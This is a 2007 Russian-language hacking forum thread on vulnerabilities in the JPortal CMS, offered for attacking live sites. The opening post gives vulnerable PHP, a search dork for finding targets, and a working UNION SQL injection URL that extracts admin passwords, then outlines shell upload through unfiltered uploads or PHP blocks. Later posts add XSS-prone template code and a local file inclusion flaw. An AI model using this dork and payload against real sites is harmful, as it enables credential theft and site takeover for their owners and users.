JPoprtal 2.3.1 и ниже SQL иньекция.

JPoprtal 2.3.1 и ниже SQL иньекция.

09.11.2007, 15:43

Alexsize

Fail

Регистрация: 17.09.2005

Сообщений: 2,242

С нами: 10866626

Репутация: 4268

JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:


		
			
function topic_name($a) 

{    

global $topic_tbl;

$query = "SELECT * FROM $topic_tbl WHERE id=$a";

$result = mysql_query($query);  

$r = mysql_fetch_array($result);    

return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

}

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:

articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
...

Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..

09.11.2007, 16:23

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

С нами: 10467746

Репутация: 4738

ещё одна https://forum.antichat.ru/thread53101.html
ЗЫ один минус: на многих стоят детекторы атаки sql-inj

JPoprtal 2.3.1 Passive XSS and Local File Inclusion.

14.11.2007, 01:47

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

С нами: 10153766

Репутация: 2565

JPoprtal 2.3.1 Passive XSS and Local File Inclusion.

Passive XSS in "theme/Default/index.php" :

Код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">

Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":

Код:

function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Последний раз редактировалось [53x]Shadow; 14.11.2007 в 01:52..

14.11.2007, 20:01

Alexsize

Fail

Регистрация: 17.09.2005

Сообщений: 2,242

С нами: 10866626

Репутация: 4268

Цитата:

Сообщение от [53x]Shadow

Passive XSS in "theme/Default/index.php" :

Код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">

Код:

function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Насчет локал инклуда могу сказать точно - большинство сайтов от него закрыты. Я не стал его постить поэтому. Про ксс тоже знал, правда активную. Кое где ее неумело поприменяли=) Но рыть ее не стал.

__________________
...

Создать сделку

Мои сделки

Сделка